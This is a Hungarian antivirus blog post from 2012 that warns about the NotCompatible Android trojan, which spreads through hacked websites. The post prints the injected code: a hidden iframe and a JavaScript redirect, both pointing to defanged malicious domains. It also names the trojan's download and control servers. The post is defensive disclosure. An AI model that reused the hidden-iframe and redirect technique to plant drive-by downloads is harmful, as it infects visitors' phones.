Vírusírtó Blog

Feltört weboldalakról is kerülhet vírus a telefonunkra

2012.05.13. 07:37 G Data

title_notcom.jpgFeltört weboldalakra látogatva nemcsak számítógépünk, de okostelefonunk is megfertőződhet különböző kártevőkkel.

 

Szerencsére a veszély elhárítása nem túl nehéz, szokás szerint a józan eszünkre kell hallgatni, és betartani az unalomig ismert szabályokat.

 

 

A PC-s világban egyáltalán nem szokatlan, hogy a kártevőket feltört, vagy már direkt így készített weboldalak segítségével terjesztik. A gyanútlan felhasználó ellátogat az adott helyre, és megfelelő biztonsági szoftver hiányában már gépére is kerül a program, ami aztán zombivá változtatja rendszerét, ellopja személyes adatait, pénzét, és így tovább.

  

Ma viszont már nemcsak a PC-n, hanem az okostelefonokon érkező látogatót is egyre nagyobb veszélynek vannak kitéve. A nemrég felfedezett NotCompatible nevű trójai az első, ami ilyen drive-by-download módszerrel támadja az androidos mobilokat. A fertőzött oldalon egy rejtett iframe segítségével indítják el a letöltést, az alkalmazást viszont már a felhasználónak kell telepítenie. Ebben a bűnözők természetesen az ő felkészületlenségükre, gyanútlanságukra alapozzák várakozásaikat, a letöltött programot ugyanis rendszerfrissítésként próbálják beállítani.

 

2012.05.13_notcom_002.jpeg 

2012.05.13_notcom_001.jpeg

 

Nem árt tudni, hogy az Androidhoz ilyen frissítést sosem fogunk ismeretlen weboldalakon keresztül megkapni. Ahhoz, hogy a telepítés sikerüljön, engedélyezni kell az alapból letiltott Ismeretlen források menüpontot az Android Beállítások / Alkalmazások menüjében.

 

A fertőzött weboldal alján általában a következő kódot találhatjuk meg:

 

<iframe

style=”visibility: hidden; display: none; display: none;”

src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

 

Amennyiben a gaoanalitics.info oldalra egy PC-s böngészővel látogatunk el, Not Found hibaüzenetet kapunk, ha viszont a böngésző Androidként jelentkezik be, a következő szöveget kapjuk vissza:

 

<html><head></head><body><script  type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

 

Ennek hatására indul a trójai letöltése.

 

A trójait a gaoanalitics.info és az androidonlinefix.info oldalakról kerül telefonunkra, míg a notcompatibleapp.eu egyfajta irányítóközpont szerepét tölti be.

 

A NotCompatible maga egy egyszerű TCP/IP proxy, ami nem is annyira a telefont veszélyezteti, mint inkább azokat a hálózatokat, amikhez a készülék csatlakozik, rajta keresztül ugyanis be lehet lépni a védett céges rendszerekbe is.

 

 

Forrás: The Official Logout Blog.

 

Tetszett a bejegyzés? Lájkolj minket a Facebookon!

Írj kommentet

A bejegyzés trackback címe:

https://virusirto.blog.hu/api/trackback/id/tr154505193

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

Nincsenek hozzászólások.

Értesülj az új átverésekről a Facebookon!

Címkék

adatbiztonság (1) adathalászat (10) adatvédelem (35) Adobe (1) alkalmazás (13) amazon (1) android (36) android market (1) anonymus (1) apple (8) arcfelismerés (2) arcfelismerési technológia (1) átverés (41) Audi (1) bank (1) BankGuard (1) bankkártya (4) biometrikus azonosító (1) bitcoin (1) biztonság (20) blizzard (1) botnet (1) bouncer (1) celeb (1) cenzúra (1) chat (1) Chrome (1) cnn (1) csalás (8) csoport (1) cyberbullying (1) ddos (1) dnt (1) domén (1) e-book (1) e-mail (1) email (4) emoji (1) engedély (1) esemény (1) EU (1) europol (3) Facebook (10) facebook (129) Facebook hangulatjelek (1) fbi (3) felhő (1) felmérés (17) féreg (2) fiók (1) Flame (1) foci (1) frissítés (1) gdata (1) geotagging (2) Gmail (1) google (9) gps (1) gyermek (2) G Data (33) G data (3) g data (6) G Data BankGuard (1) G Data jelszómenedzser (1) G Data TotalProtection (1) hack (2) hacker (36) híresség (1) hoax (1) Hotmail (1) hozzáférés (2) hummer (1) idővonal (2) információbiztonság (2) instagram (4) intel (1) internet (4) internetbiz (1) internetbiztonság (62) ios (1) iOS (2) ipari kémkedés (1) jelszó (2) Jelszókezelő (1) jogok (3) kártevő (47) katasztrófa (1) kémkedés (1) kémprogram (1) keresés (1) kéretlen program (1) kiberbűnözés (2) kiberháború (3) kínai közösségi média (1) komment (1) közösségi média (1) közösségi portál (1) lájk (1) like (4) Linux (1) linux (1) mac (1) macintosh (1) maya (1) média (1) megosztás (6) metaadat (1) Microsoft (2) mobiltelefon (5) napló (1) Nigéria (3) okosóra (1) okostelefon (2) olimpia (1) online (3) Online bankolás (1) online bankolás (1) Ötven Cent Csoport (1) password (1) phising (1) Pokémon Go (1) Popcorn TIme (1) poszt (1) ransomware (13) rendőrség (2) rootkit (1) sérülékenység (9) Skype (1) skype (2) smart tv (5) spam (10) személyi (3) születésnap (1) szülői felügyelet (1) tartalomszűrés (1) tartózkodási hely (1) ThyssenKrupp (1) törlés (1) torrent (3) trójai (19) twitter (1) update (1) usb (5) vásárlás (1) védelem (2) végítélet (1) videó (1) vírus (2) virusirtó (1) vírusirtó (12) VirusTotal (1) visszaélés (1) Vista (1) vízjel (1) vodafone (1) warcraft (1) Weibo (1) whatsapp (1) wifi (3) Windows (2) windows (1) wordpress (1) World of Warcraft (1) WoW (1) Yahoo (1) Yahoo! (1) zaklatás (1) Zeus (1) zsaroló kártevő (5) Címkefelhő